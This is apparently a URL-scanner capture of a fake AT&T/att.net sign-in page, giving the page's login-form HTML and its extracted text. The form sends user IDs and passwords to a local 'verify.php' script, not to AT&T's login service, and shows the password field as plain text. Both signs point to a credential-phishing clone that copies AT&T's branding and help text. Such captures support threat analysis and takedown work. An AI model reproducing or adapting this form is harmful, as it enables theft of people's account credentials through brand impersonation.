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Submission: On November 28 via manual — Scanned from DE
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1 forms found in the DOMName: LoginForm — POST verify.php
<form action="verify.php" method="post" id="LoginForm" focus="userid" name="LoginForm" type="com.sbc.idm.igate_edam.forms.LoginFormBean">
<input type="hidden" name="style" value="ATTidp">
<input type="hidden" name="targetURL"
value="https://loginprodx.att.net/FIM/sps/ATTidp/saml20/logininitial?RequestBinding=HTTPPost&PartnerId=https://login.yahoo.com/saml/2.0/att&.lang=en-US&Target=https%3a//att.yahoo.com/%3f.lts=1415577160">
<h1><strong>Sign in to Continue!</strong></h1>
<ul class="uLogin">
<li id="uID">
<span class="deleteicon"><label for="nameBox">User ID/Email Address</label><input type="text" name="userid" id="nameBox" value="" maxlength="50" size="50" class="slidTxtbox" title="Userid"><span></span></span>
<div class="quesIcon" id="ques1"><a href="#" class="tip" title="Tips for signing in">Sign In Tips</a>
<div id="qAns1" class="qAns">
<div class="overContent">
<h3>Sign in tips</h3>
<p>You can log in with your AT&T Email Address username@currently.com OR</p>
<p>
username@ameritech.net<br>username@att.net<br>username@bellsouth.net<br>username@flash.net<br>username@nvbell.net<br>username@pacbell.net<br>username@prodigy.net<br>username@sbcglobal.net<br>username@snet.net<br>username@swbell.net<br>username@wans.net
</p>
<p class="pBr"><a href="https://www.att.com/esupport/article.html#!/wireless/KM1187387" title="Learn about shared passwords for AT&T email" -="">Learn about shared passwords for AT&T <br>email.</a></p>
<!--<a href="#" class="close">Close</a>-->
</div>
</div>
</div>
<p class="fgtEml">
<a href="https://www.att.com/olam/unauth/enterEmailForgotId.myworld?origination_point=att.net&Return_URL=https://loginprodx.att.net/FIM/sps/ATTidp/saml20/logininitial?RequestBinding=HTTPPost&PartnerId=https://login.yahoo.com/saml/2.0/att&.lang=en-US&Target=https%3a//att.yahoo.com/%3f.lts=1415577160&Cancel_URL=https://loginprodx.att.net/FIM/sps/ATTidp/saml20/logininitial?RequestBinding=HTTPPost&PartnerId=https://login.yahoo.com/saml/2.0/att&.lang=en-US&Target=https%3a//att.yahoo.com/%3f.lts=1415577160" id="fgtEml" class="colLink">Forgot User ID/Email Address?</a>
</p>
</li>
<li id="uPwd">
<span class="deleteicon"><label for="pwdBox">Password</label><input type="text" name="password" id="pwdBox" value="" maxlength="50" size="50" class="slidTxtbox" autocomplete="off" title="Password"><span></span></span>
<p class="fgtPwd"><a href="#" id="fgtPwd" class="colLink">Forgot Password?</a></p>
</li>
<li id="shwPc">
<p><input name="showPwd" id="showPwd" class="slidChkBox" type="checkbox"><label for="showPwd">Show password characters</label></p>
</li>
<li id="uRM">
<p><input type="checkbox" name="rememberID" id="rememberID" class="slidChkBox"><label for="rememberID">Keep me signed in</label></p>
<p>for 2 weeks unless I sign out. <span class="quesIcon" id="ques2"><a href="#" class="tip" title="Additional Information about Keep Me Signed In">Additional Information about Keep Me Signed In</a><span id="qAns2" class="qAns"></span></span>
</p>
<div class="overContent">
<h3>What does "Keep me signed in" mean?</h3>
<p> Many of our users have asked for a way to reduce how frequently they're asked to sign-in to att.net and Mail. By checking this new box you'll stay signed in for up to 2 weeks or until you sign out. You'll get easier access to your mail,
photos, music, and all your other stuff, even if you close your browser or shut down your computer.</p>
<p>To protect your most sensitive data and activities (like changing your password or using your credit card), we'll ask you to re-enter your password when you access some AT&T services.</p>
<h3>What if I'm on a computer that I share with others?</h3>
<p>If you're using a public computer or you share this computer with others, we recommend that you uncheck the "Keep me signed in" box.</p>
<p>This checkbox applies to this computer only. So, for example, you can stay signed in on your home computer, but maintain more frequent password protection on your work or school computer.</p>
<p>You can change the length of time you remain signed in to att.net and Mail, once you are signed in, by clicking on the "My Account" link at the top of most of the att.net pages. Go to the "Member Information" section to change the
frequency whereby AT&T will prompt you for your password. If you do so, AT&T will ask you to verify your password more frequently, although your sign-in screen will indicate every "two weeks".</p>
<p>If you need to sign out, remember to click the "Sign Out" link located at the top of most att.net pages when you're signed in.</p><!--<a href="#" class="close">Close</a>-->
</div>
<p></p>
<p class="text-desktop">(Uncheck if on a shared computer.)</p>
<p class="text-mobile">(Uncheck if on a shared device.)</p>
</li>
<li id="uBtn">
<input type="submit" id="submitLogin" value="Sign In" class="loginBtn">
</li>
<li id="uActCr">
<label for="regurl">Don't have an AT&T Account?</label>
<a href="https://attreg.att.net/PortalRegWeb/PortalRegController?callingAppId=OP&returnUrl=" id="regurl"><input id="acctCreate" class="loginBtnClear" value="Create AT&T Account" type="button"></a>
</li>
</ul>
<div id="lognp"><img width="1" height="1" alt="" src="https://home.secureapp.att.net/attportal/s/context.dll?id=9002001&type=clickthru&name=cgate.signIn.Pageviews.www-att-net&redirecturl=/i/s.gif?nocache=9506"></div>
<div id="overLayCheck" class="overLayRight1">
<h3>You have chosen to stay signed in for 2 weeks. What does this mean?</h3>
<p>Many of our AT&T users have asked for a way to reduce how frequently they're asked to sign-in to att.net. By checking this new box, you'll stay signed in for up to 2 weeks or until you sign out. To protect your most sensitive data and
activities (like changing your password or using your credit card), we'll ask you to re-enter your password when you access some AT&T services.</p>
<p>If you're using a public computer or you share this computer with others, we recommend that you uncheck the "Keep me signed in" box.</p>
<p>This checkbox applies to this computer only. So, for example, you can stay signed in on your home computer, but maintain more frequent password protection on your work or school computer.</p>
<p>If you need to sign out, remember to click the "Sign Out" link located at the top of most att.net pages when you're signed in.</p>
<ul class="btnSignIn">
<li><button id="btnKeepMe" class="btnLong" onclick="chkTick()">Keep Me Signed In</button></li>
<li><button id="btnSignIn" class="btnLong" onclick="unchkTick()">Sign Me In, but I don't want to stay Signed In for 2 weeks</button></li>
</ul>
<div class="clrAll"></div>
</div>
</form>
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* att.net * att.com * uverse.com * En Español AT&T * AT&T Support SIGN IN TO CONTINUE! * User ID/Email Address Sign In Tips SIGN IN TIPS You can log in with your AT&T Email Address username@currently.com OR username@ameritech.net username@att.net username@bellsouth.net username@flash.net username@nvbell.net username@pacbell.net username@prodigy.net username@sbcglobal.net username@snet.net username@swbell.net username@wans.net Learn about shared passwords for AT&T email. Forgot User ID/Email Address? * Password Forgot Password? * Show password characters * Keep me signed in for 2 weeks unless I sign out. Additional Information about Keep Me Signed In WHAT DOES "KEEP ME SIGNED IN" MEAN? Many of our users have asked for a way to reduce how frequently they're asked to sign-in to att.net and Mail. By checking this new box you'll stay signed in for up to 2 weeks or until you sign out. You'll get easier access to your mail, photos, music, and all your other stuff, even if you close your browser or shut down your computer. To protect your most sensitive data and activities (like changing your password or using your credit card), we'll ask you to re-enter your password when you access some AT&T services. WHAT IF I'M ON A COMPUTER THAT I SHARE WITH OTHERS? If you're using a public computer or you share this computer with others, we recommend that you uncheck the "Keep me signed in" box. This checkbox applies to this computer only. So, for example, you can stay signed in on your home computer, but maintain more frequent password protection on your work or school computer. You can change the length of time you remain signed in to att.net and Mail, once you are signed in, by clicking on the "My Account" link at the top of most of the att.net pages. Go to the "Member Information" section to change the frequency whereby AT&T will prompt you for your password. If you do so, AT&T will ask you to verify your password more frequently, although your sign-in screen will indicate every "two weeks". If you need to sign out, remember to click the "Sign Out" link located at the top of most att.net pages when you're signed in. (Uncheck if on a shared computer.) (Uncheck if on a shared device.) * * Don't have an AT&T Account? YOU HAVE CHOSEN TO STAY SIGNED IN FOR 2 WEEKS. WHAT DOES THIS MEAN? Many of our AT&T users have asked for a way to reduce how frequently they're asked to sign-in to att.net. By checking this new box, you'll stay signed in for up to 2 weeks or until you sign out. To protect your most sensitive data and activities (like changing your password or using your credit card), we'll ask you to re-enter your password when you access some AT&T services. If you're using a public computer or you share this computer with others, we recommend that you uncheck the "Keep me signed in" box. This checkbox applies to this computer only. So, for example, you can stay signed in on your home computer, but maintain more frequent password protection on your work or school computer. If you need to sign out, remember to click the "Sign Out" link located at the top of most att.net pages when you're signed in. * Keep Me Signed In * Sign Me In, but I don't want to stay Signed In for 2 weeks * Terms * Privacy * Advertise * Advertising Choices * Acceptable Use Policy * Feedback © 2020 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.